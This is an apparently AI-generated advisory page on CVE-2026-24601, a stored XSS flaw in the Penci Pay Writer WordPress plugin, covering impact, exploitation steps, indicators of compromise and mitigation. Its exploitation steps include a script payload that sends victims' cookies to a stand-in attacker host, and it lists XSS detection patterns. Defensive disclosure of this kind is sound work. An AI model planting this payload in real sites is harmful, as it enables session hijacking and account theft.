CVE-2026-24601
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-24601 is a Stored Cross-Site Scripting (XSS) vulnerability in the PenciDesign Penci Pay Writer WordPress plugin. It affects all versions of the plugin through version 1.5, with no lower bound specified. The vulnerability was published on January 23, 2026, and was reported by Patchstack. It carries a CVSS v3.1 base score of 6.5 (Medium), assigned by Patchstack (NVD, Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. An authenticated attacker with low privileges can inject malicious scripts into fields processed by the plugin, which are then persistently stored and rendered in the browser of any user who views the affected page. Exploitation requires user interaction (a victim visiting the page containing the injected payload) and results in a changed scope, meaning the impact can extend beyond the plugin's own context to affect the broader WordPress site environment (NVD, Patchstack).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, defacement of web content, or redirection of users to malicious sites. The changed scope means the impact can affect users and administrators beyond the plugin's direct functionality, with low confidentiality, integrity, and availability impacts per the CVSS assessment (NVD).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been identified for this vulnerability. The EPSS score is extremely low at 0.0001 (0.01%), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with at least low-level privileges on the target WordPress site (NVD).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Penci Pay Writer plugin at version 1.5 or earlier, using tools such as WPScan or manual inspection of plugin directories.
  2. Authentication: Obtain or register a low-privileged account on the target WordPress site (e.g., subscriber or contributor role).
  3. Inject payload: Navigate to the plugin's input field(s) that are vulnerable to stored XSS and submit a crafted payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Payload persistence: The malicious script is stored in the WordPress database by the plugin without proper sanitization or escaping.
  5. Trigger execution: Wait for an administrator or other user to visit the page or post where the payload is rendered; the script executes in their browser context, potentially stealing session cookies or performing actions on their behalf (NVD, Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing authenticated POST requests to plugin-related endpoints containing script tags or encoded JavaScript payloads (e.g., %3Cscript%3E, javascript:, onerror=).
  • Database: Unexpected <script> tags or JavaScript event handlers stored in WordPress database tables associated with the Penci Pay Writer plugin (e.g., wp_posts, wp_postmeta, or plugin-specific tables).
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages rendered by the plugin, potentially carrying cookie or session data in query parameters.
  • Browser/Client: Unexpected redirects or pop-ups experienced by users visiting pages managed by the Penci Pay Writer plugin.

Mitigation and workarounds

Users should update the Penci Pay Writer plugin to a version beyond 1.5 that addresses this vulnerability, if a patched release has been made available by PenciDesign. If no patched version is available, the recommended workaround is to deactivate and remove the plugin until a fix is released. WordPress site administrators should also enforce the principle of least privilege, limiting plugin access to trusted users only, and consider deploying a Web Application Firewall (WAF) with XSS filtering rules as an additional layer of defense (Patchstack).

Community reactions

The vulnerability was noted in the Wordfence Intelligence Weekly WordPress Vulnerability Report covering January 12–18, 2026, which aggregates newly disclosed WordPress plugin vulnerabilities for the community (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified for this specific CVE.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-92541HIGH7.2
  • import-users-from-csv-with-meta
NoYesSep 20, 2026
CVE-2026-92540HIGH7.2
  • import-users-from-csv-with-meta
NoYesSep 20, 2026
CVE-2026-86785MEDIUM5.3
  • woo-to-facebook-shop
NoNoSep 20, 2026
CVE-2026-92965LOW3.7
  • tiktok-for-business
NoYesSep 20, 2026
CVE-2026-92423LOW2.7
  • meow-gallery
NoYesSep 20, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management